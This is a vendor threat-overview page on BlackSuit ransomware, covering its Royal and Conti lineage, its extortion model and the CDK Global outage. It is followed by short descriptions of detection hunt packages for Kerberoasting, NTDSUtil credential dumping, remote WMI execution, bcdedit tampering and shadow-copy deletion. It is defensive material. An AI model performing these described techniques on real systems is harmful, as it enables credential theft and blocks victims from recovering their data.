Threat Overview - BlackSuit Ransomware
BlackSuit ransomware recently has established itself as a significant threat since its emergence in May 2023. Originating from members of the Royal ransomware group, which was split off from the infamous Conti ransomware gang, BlackSuit represents a continuation and evolution of sophisticated ransomware tactics. Several operators use the ransomware as part of a ransomware-as-a-service (RaaS). They leverage extensive experience and advanced methods to target a variety of sectors with a particular focus on critical infrastructure, health care, construction, manufacturing and industrial goods. The ransomware's dual-extortion strategy involves both data encryption and exfiltration, pressuring victims to pay hefty ransoms under the threat of data leakage. Most recently, the Bleeping Computer cybersecurity news website reported BlackSuit was responsible for taking the U.S.-based information technology (IT) company CDK Global offline, which caused massive outages for users of its products, such as car dealerships. The outage was extended from its original cybersecurity incident due to a second incident occurring as the organization was bringing its services back online.
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
GET YOUR FREE HUNTER COMMUNITY ACCOUNT!
Hunt Packages
First Time Script Or Sysinternals Execution - Registry Key Modification
This package is designed to capture the first time execution of scripts and sysinternal executable. If it is the first time running some scripts or most Windows Sysinternal programs, the user much accept the End User License Agreement. This can be done in two ways: 1) Issue the -accepteula commandline argument OR 2) Click agree when the pop-up prompts you. Either way, when this happens a registry key is modified to save these changes and next time the program is run the prompt will not pop up.
Autorun or ASEP Registry Key Modification
A common method that adversaries and malicious software alike achieve persistence is by adding a program to the startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder allows the referenced program to be executed when a user logs in. They are often utilized for legitimate purposes, however when utilized maliciously the key name/value is often obviously suspicious, such as random names, or objects loaded from temp or public folders.
Possible Kerberoasting - Ticket Granting Service (TGS) Request Without Login
This content is designed to detect when an account requests a Ticket Granting Service (TGS) ticket without a valid Ticket Granting Ticket (TGT).
Remote WMI Command Attempt
This hunt searches for wmic.exe being launched with parameters to operate on remote systems. This could uncover an attacker abusing WMI functionality, in order to potentially perform remote executions or to simply gather information.
Dump Active Directory Database with NTDSUtil - Potential Credential Dumping
This content is designed to identify when NTDSutil.exe is used to create a full backup of active directory. This technique is utilized by the Conti ransomware and Trickbot malware to steal data from a compromised host.
Suspicious bcdedit Activity - Potential Ransomware
BCDEdit is a command-line tool for managing Boot Configuration Data (BCD). Ransomware is known to utilize bcdedit to modify the boot configuration to prevent recovery. The intent of this package is to identify when bcdedit is being utilized with several common malicious commands, such as delete and safeboot.
WinSCP Session Created - Possible Data Exfil
This hunt package is designed to capture the activity surrounding the execution of the commandline arguments that will begin a session using WinSCP through the commandline interface.
Possible Kerberoasting - Encryption Downgrade Attack
This use case is designed to detect when a Ticket Granting Service (TGS) ticket is requested with an RC4 encryption.
Remote Process Instantiation via WMI
This use case is meant to identify wmic.exe being launched with parameters to spawn a process on a remote system.
Shadow Copies Deletion Using Operating Systems Utilities
Ransomware is known to delete Windows shadow copies before it begins encrypting the data on the victim host. This tactic is typically carried out with powershell, vssadmin or wmic. This package identifies activity by powershell, wmic, vssadmin or vssvc with command line arguments containing delete and variations of shadow.
